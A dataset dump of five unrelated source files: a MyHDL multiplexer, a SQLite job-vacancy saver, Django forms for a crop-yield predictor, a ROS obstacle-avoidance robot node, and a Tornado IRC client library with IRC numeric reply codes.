+{"seq_id":"208967390","text":"from myhdl import block, always_comb, Signal\n\n@block\ndef mux(z, a, b, sel):\n\n \"\"\" Multiplexer.\n\n z -- mux output\n a, b -- data inputs\n sel -- control input: select a if asserted, otherwise b\n\n \"\"\"\n\n @always_comb\n def comb():\n # we could build it with gates\n # logic is z = sel & a | (~ sel) & b\n if sel == 1:\n z.next = a\n else:\n z.next = b\n\n return comb\n\n\nif __name__ == \"__main__\":\n from myhdl import intbv, delay, instance\n @block\n def test_mux():\n\n # create signals\n z, a, b, sel = [Signal(intbv(0)) for i in range(4)]\n\n # instantiating a block\n mux_1 = mux(z, a, b, sel)\n\n @instance\n def stimulus():\n print(\"z a b sel\")\n for i in range(10):\n a.next, b.next, sel.next = (i & 1), ((i >> 1) & 1), ((i >> 2) & 1)\n yield delay(10)\n print(\"%s %s %s %s\" % (z, a, b, sel))\n\n return mux_1, stimulus\n\n tb = test_mux()\n tb.config_sim(trace=True)\n tb.run_sim()\n","sub_path":"digital-logic/myhdl/mux.py","file_name":"mux.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"396319218","text":"import sqlite3\nimport sys\nimport os\nimport traceback\n\nfrom tqdm import tqdm\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom ..vacancies import get_vacancy\nfrom ..constants import DB_FILE_PATH\nfrom ..constants import SHEMA_FILE_PATH\nfrom ..constants import INSERT_FILE_PATH\nfrom ..constants import DOWNLOADING_VACANCIES_MSG\n\n\ndef create_db(db_file=DB_FILE_PATH):\n \"\"\"\n Creates a SQLite database.\n \"\"\"\n try:\n with sqlite3.connect(db_file) as db:\n with open(SHEMA_FILE_PATH, 'r') as f, closing(db.cursor()) as cur:\n cur.executescript(f.read())\n return True\n except sqlite3.Error as err:\n print(err, file=sys.stderr)\n traceback.print_stack()\n except IOError as err:\n print(err, file=sys.stderr)\n return False\n\n\ndef save_vacancy(vacancy, connection_obj):\n \"\"\"\n Saves a vacancy to the SQLite database.\n \"\"\"\n try:\n with open(INSERT_FILE_PATH, 'r') as f, closing(connection_obj.cursor()) as cur:\n # saving area\n cur.execute(f.readline(),\n (int(vacancy['area']['id']),\n vacancy['area']['url'],\n vacancy['area']['name']))\n # saving salary\n cur.execute(f.readline(),\n (vacancy['salary']['from'],\n vacancy['salary']['to'],\n vacancy['salary']['currency'],\n vacancy['salary']['gross']))\n cur.execute(f.readline())\n salaryID = cur.fetchone()[0]\n # saving employer\n cur.execute(f.readline(),\n (vacancy['employer'].get('id', 'NULL'),\n vacancy['employer']['name'],\n vacancy['employer'].get('url', 'NULL'),\n vacancy['employer'].get('alternate_url', 'NULL'),\n vacancy['employer'].get('trusted', 'NULL'),\n vacancy['employer'].get('blacklisted', 'NULL')))\n cur.execute(f.readline())\n employerID = cur.fetchone()[0]\n # saving vacancy\n cur.execute(f.readline(),\n (int(vacancy['id']),\n vacancy['name'],\n vacancy['description'],\n vacancy['published_at'],\n int(vacancy['area']['id']),\n salaryID,\n employerID))\n connection_obj.commit()\n except IOError as err:\n print(err, file=sys.stderr)\n\n\ndef vacancies_to_db(id_list, db_file=DB_FILE_PATH, recreate=False):\n \"\"\"\n Saves vacancies which IDs are transferred in the list\n to the SQLite database.\n \"\"\"\n if recreate or not os.path.exists(db_file):\n create_db(db_file)\n try:\n with sqlite3.connect(db_file) as db:\n print(DOWNLOADING_VACANCIES_MSG)\n for vac_id in tqdm(id_list):\n vac = get_vacancy(vac_id)\n save_vacancy(vac, db)\n return True\n except RequestException as err:\n print(err, file=sys.stderr)\n except sqlite3.Error as err:\n print(err, file=sys.stderr)\n traceback.print_stack()\n return False\n","sub_path":"lab2/hhVacancies/sql/vacancies_sql.py","file_name":"vacancies_sql.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36766773","text":"from django import forms\nimport numpy as np\nimport pandas as pd\n\nclass FeedbackForm(forms.Form):\n name = forms.CharField(\n label=\"\",\n widget= forms.TextInput(\n attrs={\n \"class\":\"form-control\",\n \"placeholder\" : \"Enter Name\"\n }\n )\n )\n email = forms.EmailField(\n label=\"\",\n widget=forms.EmailInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"Enter Email\"\n }\n )\n )\n contact = forms.IntegerField(\n label=\"\",\n widget=forms.NumberInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"Enter Contact\"\n }\n )\n )\n feedback = forms.CharField(\n label=\"\",\n widget= forms.Textarea(\n attrs={\n \"class\" : \"form-control\",\n \"placeholder\" : \"Your Feedback\"\n }\n )\n )\nclass PredictionForm(forms.Form):\n data = pd.read_csv('E:\\Major project\\AgriYieldPredict\\static\\datasets\\district_UP.csv')\n x = data.iloc[ :,:].values\n AREA_CHOICE = (('Select','Select Area'),)\n for i in x:\n AREA_CHOICE = AREA_CHOICE+(tuple(i),)\n area = forms.ChoiceField(\n widget=forms.Select(\n attrs={\n 'class' : 'form-control'\n }\n ),\n choices = AREA_CHOICE,\n label=\"\"\n )\n data2 = pd.read_csv('E:\\Major project\\AgriYieldPredict\\static\\datasets\\months.csv')\n MONTH_CHOICE = (('Select', 'Select Month'),)\n y = data2.iloc[:,:].values\n for j in y:\n MONTH_CHOICE = MONTH_CHOICE+(tuple(j),)\n month = forms.ChoiceField(\n widget=forms.Select(\n attrs={\n 'class' : 'form-control'\n }\n ),\n choices = MONTH_CHOICE,\n label=\"\"\n )\n data3 = pd.read_csv('E:\\Major project\\AgriYieldPredict\\static\\datasets\\soil.csv')\n SOIL_CHOICE = (('Select', 'Select Soil Type'),)\n z = data3.iloc[:, :].values\n for k in z:\n SOIL_CHOICE = SOIL_CHOICE + (tuple(k),)\n soil = forms.ChoiceField(\n widget=forms.Select(\n attrs={\n 'class': 'form-control'\n }\n ),\n choices=SOIL_CHOICE,\n label=\"\"\n )\n","sub_path":"AgriYieldPredict/YieldPridict/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375580129","text":"#!/usr/bin/env python\nimport threading\n\nimport rospy\nfrom std_msgs.msg import Float64MultiArray\nfrom std_msgs.msg import UInt16MultiArray\nfrom std_msgs.msg import UInt16\n\nimport time\n\nfinishBayDirection = 0\nright_direction = 116\nleft_direction = 225\nir_right = 0\nir_left = 0\ncurrentDirection = 0\nultRight = 0\nultLeft = 0\ncurrentIrRight = 0\ncurrentIrLeft = 0\nservoAngle = 0\ntraveledDistance = 0\nseq = 0\nservo_status = 1\n\ndef logDirection(data):\n # rospy.loginfo(data)\n global finishBayDirection\n global currentDirection\n if finishBayDirection == 0:\n finishBayDirection = data.data\n currentDirection = data.data\n\n\ndef logUltServo(data):\n # rospy.loginfo(data)\n global ultRight\n global ultLeft\n global servoAngle\n ultRight = data.data[0]\n ultLeft = data.data[1]\n servoAngle = data.data[2]\n # avoid_ob()\n\n\ndef logIr(data):\n # rospy.loginfo(data)\n # reference global vars\n global ir_right\n global ir_left\n # check if the init values have been registered\n if ir_right == 0:\n ir_right = data.data[0]\n print(ir_right)\n if ir_left == 0:\n ir_left = data.data[1]\n print(ir_left)\n # reference temp global vars then update values\n global currentIrRight\n currentIrRight = data.data[0]\n global currentIrLeft\n currentIrLeft = data.data[1]\n # avoid_drop()\n\n\ndef avoid_ob():\n # fhfkd\n global ultRight\n global ultLeft\n global servoAngle\n pub = rospy.Publisher('/cmd_vel_action', UInt16MultiArray, queue_size=10)\n rate = rospy.Rate(3) # 10hz\n action_msg = UInt16MultiArray()\n if ultRight <= 30 or ultLeft <= 30:\n if servoAngle == 40:\n action_msg.data = [0, 1]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [0, 4]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 2]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n # avoid obstacle from the right\n # turn left\n # then right\n # try to go straight\n servoAngle = 60\n elif servoAngle == 60:\n # avoid obstacle straight\n servoAngle = 0\n elif servoAngle == 90:\n action_msg.data = [140, 2]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [140, 4]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 1]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n servoAngle = 60\n rate.sleep()\n\n global servo_status\n if servo_status == 1:\n action_msg.data = [40, 4]\n servo_status = 2\n elif servo_status == 2:\n action_msg.data = [60, 4]\n servo_status = 3\n elif servo_status == 3:\n action_msg.data = [90, 4]\n servo_status = 4\n elif servo_status == 4:\n action_msg.data = [60, 4]\n servo_status = 1\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n\n\ndef avoid_drop():\n global ir_right\n global ir_left\n global currentIrRight\n global currentIrLeft\n global currentDirection\n global left_direction\n global right_direction\n left_direction = 116\n right_direction = 225\n # publisher code\n pub = rospy.Publisher('/cmd_vel_action', UInt16MultiArray, queue_size=10)\n rate = rospy.Rate(3) # 10hz\n action_msg = UInt16MultiArray()\n while not rospy.is_shutdown():\n if currentIrRight > ir_right + 10 and currentIrLeft < ir_left + 10:\n\n # publish turn left\n action_msg.data = [60, 5]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 3]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 1]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 4]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 2]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n\n elif currentIrRight < ir_right + 10 and currentIrLeft > ir_left + 10:\n # publish turn right\n action_msg.data = [60, 5] # stop first\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 3] # go back\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 2] # turn right\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 4] # go forward\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 1] # turn left\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n\n elif currentIrRight > ir_right + 10 and currentIrLeft > ir_left + 10:\n\n action_msg.data = [60, 5]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 3]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1)\n action_msg.data = [60, 1]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 4]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n action_msg.data = [60, 2]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n time.sleep(1.2)\n\n elif currentIrRight < ir_right + 10 and currentIrLeft < ir_left + 10:\n action_msg.data = [60, 4]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n else:\n action_msg.data = [60, 0]\n rospy.loginfo(action_msg)\n pub.publish(action_msg)\n\n rate.sleep()\n\n\ndef listener():\n global seq\n rospy.init_node('pathfinder', anonymous=False)\n rospy.Subscriber(\"/direction\", UInt16, logDirection)\n rospy.Subscriber(\"/ult_srv_NF\", Float64MultiArray, logUltServo)\n rospy.Subscriber(\"/infrared\", Float64MultiArray, logIr)\n # rospy.Subscriber(\"/distance\", Float64MultiArray, logIr)\n\n avoid_drop()\n rospy.spin()\n\nif __name__ == '__main__':\n listener()\n","sub_path":"src/path_finder/src/pathfinder.py","file_name":"pathfinder.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299381078","text":"#!/usr/bin/env python3\n# -*- coding: utf8 -*-\nimport collections\nimport pprint\n\nimport chardet\nimport logbook\nfrom tornado import gen, ioloop, tcpclient\n\nimport possel\n\nlogger = logbook.Logger(__name__)\nloopinstance = ioloop.IOLoop.instance()\n\n\nclass Error(possel.Error):\n \"\"\" Root exception for IRC-related exceptions. \"\"\"\n\n\nclass UnknownNumericCommandError(Error):\n \"\"\" Exception thrown when a numeric command is given but no symbolic version can be found. \"\"\"\n\n\nclass UserNotFoundError(Error):\n \"\"\" Exception Thrown when action is performed on non-existant nick. \"\"\"\n\n\nclass UserAlreadyExistsError(Error):\n \"\"\" Exception Thrown when there is an attempt at overwriting an existing user. \"\"\"\n\n\nclass UnknownModeCommandError(Error):\n \"\"\" Exception thrown on unknown mode change command. \"\"\"\n\n\nclass KeyDefaultDict(collections.defaultdict):\n def __missing__(self, key):\n if self.default_factory is not None:\n self[key] = self.default_factory(key)\n return self[key]\n else:\n return super(KeyDefaultDict, self).__missing__(key)\n\n\ndef split_irc_line(s):\n \"\"\"Breaks a message from an IRC server into its prefix, command, and arguments.\n \"\"\"\n prefix = ''\n trailing = []\n if not s:\n # Raise an exception of some kind\n pass\n if s[0] == ':':\n prefix, s = s[1:].split(' ', 1)\n if s.find(' :') != -1:\n s, trailing = s.split(' :', 1)\n args = s.split()\n args.append(trailing)\n else:\n args = s.split()\n command = args.pop(0)\n return prefix, command, args\n\n\ndef parse_identity(who):\n nick, rest = who.split('!')\n username, host = rest.split('@')\n\n if username.startswith('~'):\n username = username[1:]\n\n return nick, username, host\n\n\ndef get_symbolic_command(command):\n if command.isdecimal():\n try:\n return numeric_to_symbolic[command]\n except KeyError as e:\n raise UnknownNumericCommandError(\"No numeric command found: '{}'\".format(command)) from e\n else:\n return command\n\n\nclass LineStream:\n def __init__(self):\n self.tcp_client_factory = tcpclient.TCPClient()\n self.line_callback = None\n self.connect_callback = None\n\n @gen.coroutine\n def connect(self, host, port):\n logger.debug('Connecting to server {}:{}', host, port)\n self.connection = yield self.tcp_client_factory.connect(host, port)\n logger.debug('Connected')\n if self.connect_callback is not None:\n self.connect_callback()\n logger.debug('Called post-connection callback')\n self._schedule_line()\n\n def handle_line(self, line):\n if self.line_callback is not None:\n self.line_callback(line)\n\n self._schedule_line()\n\n def _schedule_line(self):\n self.connection.read_until(b'\\n', self.handle_line)\n\n def write_function(self, line):\n if line[-1] != '\\n':\n line += '\\n'\n return self.connection.write(line.encode('utf8'))\n\n\nclass IRCServerHandler:\n \"\"\" Models a single IRC Server and channels/users on that server.\n\n Designed to be agnostic to various mechanisms for asynchronous code; you give it a `write_function` callback which\n it will directly call whenever it wants to send things to the server. Then you feed it each line from the IRC server\n by calling `IRCServerHandler.handle_line`.\n\n Args:\n nick (str): The nick to use for this server.\n write_function: A callback that takes a single string argument and passes it on to the IRC server connection.\n \"\"\"\n def __init__(self, identity, debug_out_loud=False):\n # Useful things\n self._write = None\n self.identity = identity\n\n # Default values\n self.motd = ''\n\n self.channels = KeyDefaultDict(lambda channel_name: IRCChannel(self._write, channel_name,\n debug_out_loud=debug_out_loud,\n identity=identity))\n\n self.users = dict()\n self.users[identity.nick] = identity\n\n self.callbacks = collections.defaultdict(set)\n\n # Configurables\n self._debug_out_loud = debug_out_loud\n\n def get_user_full(self, who):\n nick, username, host = parse_identity(who)\n try:\n user = self.users[nick]\n if not user.fully_known:\n user.username = username\n user.fully_known = True\n return user\n except KeyError:\n self.users[nick] = User(nick, username)\n self.users[nick].fully_known = True\n return self.users[nick]\n\n def get_user_by_nick(self, nick):\n try:\n return self.users[nick]\n except KeyError:\n self.users[nick] = User(nick)\n return self.users[nick]\n\n def add_callback(self, signal, callback):\n self.callbacks[signal].add(callback)\n\n @property\n def write_function(self):\n return self._write\n\n @write_function.setter\n def write_function(self, new_write_function):\n self._write = new_write_function\n\n def pong(self, value):\n self._write('PONG :{}'.format(value))\n\n def pre_line(self):\n self._write('NICK {}'.format(self.identity.nick))\n self._write('USER {} 0 * :{}'.format(self.identity.username, self.identity.real_name))\n\n def handle_line(self, line):\n try:\n line = str(line, encoding='utf8')\n except UnicodeDecodeError:\n encoding = chardet.detect(line)['encoding']\n logger.debug('UTF8 decode failed, tried autodetecting and got {}, decoding now', encoding)\n line = str(line, encoding=encoding)\n line = line.strip()\n (prefix, command, args) = split_irc_line(line)\n\n try:\n symbolic_command = get_symbolic_command(command)\n except UnknownNumericCommandError:\n self.log_unhandled(command, prefix, args)\n return\n\n try:\n handler_name = 'on_{}'.format(symbolic_command.lower())\n handler = getattr(self, handler_name)\n except AttributeError:\n self.log_unhandled(symbolic_command, prefix, args)\n else:\n handler(prefix, *args)\n\n for callback in self.callbacks[symbolic_command.lower()]:\n callback(self, prefix, *args)\n\n def log_unhandled(self, command, prefix, args):\n logger.warning('Unhandled Command received: {} with args ({}) from prefix {}'.format(command, args, prefix))\n\n # ===============\n # Handlers follow\n # ===============\n def on_ping(self, prefix, token, *args):\n logger.debug('Ping received: {}, {}', prefix, token)\n self.pong(token)\n\n def on_privmsg(self, who_from, to, msg):\n if to.startswith('#'):\n user = self.get_user_full(who_from)\n self.channels[to].on_new_message(user, msg)\n\n # ==========\n # JOIN stuff\n def on_join(self, who, channel):\n user = self.get_user_full(who)\n if user is self.identity:\n self.self_join(channel)\n else:\n self.channels[channel].user_join(user)\n\n def self_join(self, channel):\n pass\n\n def on_rpl_namreply(self, prefix, recipient, secrecy, channel, nicks):\n for nick in nicks.split():\n user = self.get_user_by_nick(nick)\n self.channels[channel].user_join(user)\n\n def on_rpl_endofnames(self, *args):\n pass\n # ==========\n\n def on_notice(self, prefix, _, message):\n logger.info('NOTICE: {}'.format(message))\n\n def on_mode(self, prefix, channel, command, nick):\n user = self.get_user_by_nick(nick)\n user.apply_mode_command(channel, command)\n\n def on_nick(self, who, new_nick):\n user = self.get_user_full(who)\n logger.debug('User {} changed nick to {}', user.nick, new_nick)\n del self.users[user.nick]\n user.name = new_nick\n self.users[new_nick] = user\n\n def on_quit(self, who, message):\n user = self.get_user_full(who)\n if user != self.identity:\n for channel in self.channels:\n try:\n self.channels[channel].user_part(user)\n except UserNotFoundError:\n pass\n\n def on_part(self, who, channel):\n user = self.get_user_full(who)\n if user != self.identity:\n self.channels[channel].user_part(user)\n\n def on_rpl_welcome(self, *args):\n pass\n\n def on_rpl_yourhost(self, *args):\n pass\n\n def on_rpl_created(self, *args):\n pass\n\n def on_rpl_myinfo(self, *args):\n pass\n\n def on_rpl_isupport(self, *args):\n logger.debug('Server supports: {}', args)\n\n def on_rpl_luserclient(self, *args):\n pass\n\n def on_rpl_luserop(self, *args):\n pass\n\n def on_rpl_luserchannels(self, *args):\n pass\n\n def on_rpl_luserme(self, *args):\n pass\n\n def on_rpl_localusers(self, *args):\n pass\n\n def on_rpl_globalusers(self, *args):\n pass\n\n def on_rpl_statsconn(self, *args):\n pass\n\n def on_rpl_motdstart(self, *args):\n self.motd = ''\n\n def on_rpl_motd(self, prefix, recipient, motd_line):\n self.motd += motd_line\n self.motd += '\\n'\n\n def on_rpl_endofmotd(self, *args):\n logger.info(self.motd)\n\n # =============\n # Handlers done\n # =============\n\n\nclass User:\n def __init__(self, name, username=None, real_name=None, password=None):\n self.name = name\n self.username = username or name\n self.real_name = real_name or name\n self.modes = collections.defaultdict(set)\n self.fully_known = False\n\n @property\n def nick(self):\n return self.name\n\n def apply_mode_command(self, channel, command):\n \"\"\" Applies a mode change command.\n\n Similar syntax to the `chmod` program.\n \"\"\"\n direction, mode = command\n if direction == '+':\n self.modes[channel].add(mode)\n elif direction == '-' and mode in self.modes:\n self.modes[channel].remove(mode)\n else:\n raise UnknownModeCommandError('Unknown mode change command \"{}\", expecting \"-\" or \"+\"'.format(command))\n\n def __str__(self):\n modes = {}\n for m in self.modes.values():\n modes |= m\n\n return '{}!{} +{}'.format(self.name, self.username,\n ''.join(modes))\n\n def __repr__(self):\n return str(self)\n\n\nclass IRCChannel:\n def __init__(self, write_function, name, identity, debug_out_loud=False):\n self._write = write_function\n self.name = name\n self.identity = identity\n self.users = set()\n self.messages = []\n\n self._debug_out_loud = debug_out_loud\n\n def user_join(self, user):\n logger.debug('{} joined {}', user, self.name)\n if user.nick in self.users:\n raise UserAlreadyExistsError(\n 'Tried to add user \"{}\" to channel {}'.format(user.nick, self.name)\n )\n self.users.add(user)\n\n def user_part(self, user):\n logger.debug('{} parted from {}', user, self.name)\n try:\n self.users.remove(user)\n except KeyError as e:\n raise UserNotFoundError(\n 'Tried to remove non-existent nick \"{}\" from channel {}'.format(user.nick, self.name)) from e\n\n def on_new_message(self, who_from, msg):\n self.messages.append((who_from, msg))\n\n if msg.startswith('!d listmessages'):\n logger.debug(self.messages)\n\n if self._debug_out_loud:\n self.send_message(self.messages)\n\n elif msg.startswith('!d listusers'):\n logger.debug(self.users)\n\n if self._debug_out_loud:\n self.send_message(pprint.pformat(self.users))\n\n elif msg.startswith('!d raise'):\n raise Error('Debug exception')\n\n def join(self, password=None):\n if password:\n self._write('JOIN {} {}'.format(self.name, password))\n else:\n self._write('JOIN {}'.format(self.name))\n\n def part(self):\n pass\n\n def send_message(self, message):\n if not isinstance(message, (str, bytes)):\n message = str(message)\n for line in message.split('\\n'):\n self.messages.append((self.identity, line))\n self._write('PRIVMSG {} :{}'.format(self.name, line))\n\n\nsymbolic_to_numeric = {\n \"RPL_WELCOME\": '001',\n \"RPL_YOURHOST\": '002',\n \"RPL_CREATED\": '003',\n \"RPL_MYINFO\": '004',\n \"RPL_ISUPPORT\": '005',\n \"RPL_BOUNCE\": '010',\n \"RPL_STATSCONN\": '250',\n \"RPL_LOCALUSERS\": '265',\n \"RPL_GLOBALUSERS\": '266',\n \"RPL_USERHOST\": '302',\n \"RPL_ISON\": '303',\n \"RPL_AWAY\": '301',\n \"RPL_UNAWAY\": '305',\n \"RPL_NOWAWAY\": '306',\n \"RPL_WHOISUSER\": '311',\n \"RPL_WHOISSERVER\": '312',\n \"RPL_WHOISOPERATOR\": '313',\n \"RPL_WHOISIDLE\": '317',\n \"RPL_ENDOFWHOIS\": '318',\n \"RPL_WHOISCHANNELS\": '319',\n \"RPL_WHOWASUSER\": '314',\n \"RPL_ENDOFWHOWAS\": '369',\n \"RPL_LISTSTART\": '321',\n \"RPL_LIST\": '322',\n \"RPL_LISTEND\": '323',\n \"RPL_UNIQOPIS\": '325',\n \"RPL_CHANNELMODEIS\": '324',\n \"RPL_NOTOPIC\": '331',\n \"RPL_TOPIC\": '332',\n \"RPL_INVITING\": '341',\n \"RPL_SUMMONING\": '342',\n \"RPL_INVITELIST\": '346',\n \"RPL_ENDOFINVITELIST\": '347',\n \"RPL_EXCEPTLIST\": '348',\n \"RPL_ENDOFEXCEPTLIST\": '349',\n \"RPL_VERSION\": '351',\n \"RPL_WHOREPLY\": '352',\n \"RPL_ENDOFWHO\": '315',\n \"RPL_NAMREPLY\": '353',\n \"RPL_ENDOFNAMES\": '366',\n \"RPL_LINKS\": '364',\n \"RPL_ENDOFLINKS\": '365',\n \"RPL_BANLIST\": '367',\n \"RPL_ENDOFBANLIST\": '368',\n \"RPL_INFO\": '371',\n \"RPL_ENDOFINFO\": '374',\n \"RPL_MOTDSTART\": '375',\n \"RPL_MOTD\": '372',\n \"RPL_ENDOFMOTD\": '376',\n \"RPL_YOUREOPER\": '381',\n \"RPL_REHASHING\": '382',\n \"RPL_YOURESERVICE\": '383',\n \"RPL_TIME\": '391',\n \"RPL_USERSSTART\": '392',\n \"RPL_USERS\": '393',\n \"RPL_ENDOFUSERS\": '394',\n \"RPL_NOUSERS\": '395',\n \"RPL_TRACELINK\": '200',\n \"RPL_TRACECONNECTING\": '201',\n \"RPL_TRACEHANDSHAKE\": '202',\n \"RPL_TRACEUNKNOWN\": '203',\n \"RPL_TRACEOPERATOR\": '204',\n \"RPL_TRACEUSER\": '205',\n \"RPL_TRACESERVER\": '206',\n \"RPL_TRACESERVICE\": '207',\n \"RPL_TRACENEWTYPE\": '208',\n \"RPL_TRACECLASS\": '209',\n \"RPL_TRACERECONNECT\": '210',\n \"RPL_TRACELOG\": '261',\n \"RPL_TRACEEND\": '262',\n \"RPL_STATSLINKINFO\": '211',\n \"RPL_STATSCOMMANDS\": '212',\n \"RPL_ENDOFSTATS\": '219',\n \"RPL_STATSUPTIME\": '242',\n \"RPL_STATSOLINE\": '243',\n \"RPL_UMODEIS\": '221',\n \"RPL_SERVLIST\": '234',\n \"RPL_SERVLISTEND\": '235',\n \"RPL_LUSERCLIENT\": '251',\n \"RPL_LUSEROP\": '252',\n \"RPL_LUSERUNKNOWN\": '253',\n \"RPL_LUSERCHANNELS\": '254',\n \"RPL_LUSERME\": '255',\n \"RPL_ADMINME\": '256',\n \"RPL_ADMINLOC\": '257',\n \"RPL_ADMINLOC\": '258',\n \"RPL_ADMINEMAIL\": '259',\n \"RPL_TRYAGAIN\": '263',\n \"ERR_NOSUCHNICK\": '401',\n \"ERR_NOSUCHSERVER\": '402',\n \"ERR_NOSUCHCHANNEL\": '403',\n \"ERR_CANNOTSENDTOCHAN\": '404',\n \"ERR_TOOMANYCHANNELS\": '405',\n \"ERR_WASNOSUCHNICK\": '406',\n \"ERR_TOOMANYTARGETS\": '407',\n \"ERR_NOSUCHSERVICE\": '408',\n \"ERR_NOORIGIN\": '409',\n \"ERR_NORECIPIENT\": '411',\n \"ERR_NOTEXTTOSEND\": '412',\n \"ERR_NOTOPLEVEL\": '413',\n \"ERR_WILDTOPLEVEL\": '414',\n \"ERR_BADMASK\": '415',\n \"ERR_UNKNOWNCOMMAND\": '421',\n \"ERR_NOMOTD\": '422',\n \"ERR_NOADMININFO\": '423',\n \"ERR_FILEERROR\": '424',\n \"ERR_NONICKNAMEGIVEN\": '431',\n \"ERR_ERRONEUSNICKNAME\": '432',\n \"ERR_NICKNAMEINUSE\": '433',\n \"ERR_NICKCOLLISION\": '436',\n \"ERR_UNAVAILRESOURCE\": '437',\n \"ERR_USERNOTINCHANNEL\": '441',\n \"ERR_NOTONCHANNEL\": '442',\n \"ERR_USERONCHANNEL\": '443',\n \"ERR_NOLOGIN\": '444',\n \"ERR_SUMMONDISABLED\": '445',\n \"ERR_USERSDISABLED\": '446',\n \"ERR_NOTREGISTERED\": '451',\n \"ERR_NEEDMOREPARAMS\": '461',\n \"ERR_ALREADYREGISTRED\": '462',\n \"ERR_NOPERMFORHOST\": '463',\n \"ERR_PASSWDMISMATCH\": '464',\n \"ERR_YOUREBANNEDCREEP\": '465',\n \"ERR_YOUWILLBEBANNED\": '466',\n \"ERR_KEYSET\": '467',\n \"ERR_CHANNELISFULL\": '471',\n \"ERR_UNKNOWNMODE\": '472',\n \"ERR_INVITEONLYCHAN\": '473',\n \"ERR_BANNEDFROMCHAN\": '474',\n \"ERR_BADCHANNELKEY\": '475',\n \"ERR_BADCHANMASK\": '476',\n \"ERR_NOCHANMODES\": '477',\n \"ERR_BANLISTFULL\": '478',\n \"ERR_NOPRIVILEGES\": '481',\n \"ERR_CHANOPRIVSNEEDED\": '482',\n \"ERR_CANTKILLSERVER\": '483',\n \"ERR_RESTRICTED\": '484',\n \"ERR_UNIQOPPRIVSNEEDED\": '485',\n \"ERR_NOOPERHOST\": '491',\n \"ERR_NOSERVICEHOST\": '492',\n \"ERR_UMODEUNKNOWNFLAG\": '501',\n \"ERR_USERSDONTMATCH\": '502',\n}\nnumeric_to_symbolic = {v: k for k, v in symbolic_to_numeric.items()}\n\n\ndef _exc_exit(unused_callback):\n import sys\n import traceback\n traceback.print_exc()\n sys.exit(1)\n\n\ndef get_arg_parser():\n import argparse\n arg_parser = argparse.ArgumentParser(description='Possel IRC Client Server')\n arg_parser.add_argument('-n', '--nick', default='possel',\n help='Nick to use on the server.')\n arg_parser.add_argument('-u', '--username', default='possel',\n help='Username to use on the server')\n arg_parser.add_argument('-r', '--real-name', default='Possel IRC',\n help='Real name to use on the server')\n arg_parser.add_argument('-s', '--server', default='irc.imaginarynet.org.uk',\n help='IRC Server to connect to')\n arg_parser.add_argument('-c', '--channel', action='append',\n help='Channel to join on server')\n arg_parser.add_argument('-D', '--debug', action='store_true',\n help='Enable debug logging')\n arg_parser.add_argument('--die-on-exception', action='store_true',\n help='Exit program when an unhandled exception occurs, rather than trying to recover')\n arg_parser.add_argument('--debug-out-loud', action='store_true',\n help='Print selected debug messages out over IRC')\n return arg_parser\n\n\ndef get_parsed_args():\n arg_parser = get_arg_parser()\n args = arg_parser.parse_args()\n\n if not args.channel:\n args.channel = ['#possel-test']\n\n return args\n\n\ndef get_attached_instances(args):\n # Create instances\n line_stream = LineStream()\n server_handler = IRCServerHandler(User(args.nick, args.username, args.real_name),\n debug_out_loud=args.debug_out_loud)\n\n # Attach instances\n server_handler.write_function = line_stream.write_function\n line_stream.connect_callback = server_handler.pre_line\n line_stream.line_callback = server_handler.handle_line\n\n if args.die_on_exception:\n loopinstance.handle_callback_exception = _exc_exit\n\n return line_stream, server_handler\n\n\ndef connect(args, line_stream, server_handler):\n # Connect\n line_stream.connect(args.server, 6667)\n\n # Join channels\n for channel in args.channel:\n loopinstance.call_later(2, server_handler.channels[channel].join)\n\n\ndef main():\n args = get_parsed_args()\n\n line_stream, server_handler = get_attached_instances()\n\n connect(args, line_stream, server_handler)\n\n # setup logging\n loghandler = logbook.StderrHandler(level=logbook.DEBUG if args.debug else logbook.INFO)\n\n # GOGOGOGO\n with loghandler.applicationbound():\n loopinstance.start()\n\nif __name__ == '__main__':\n 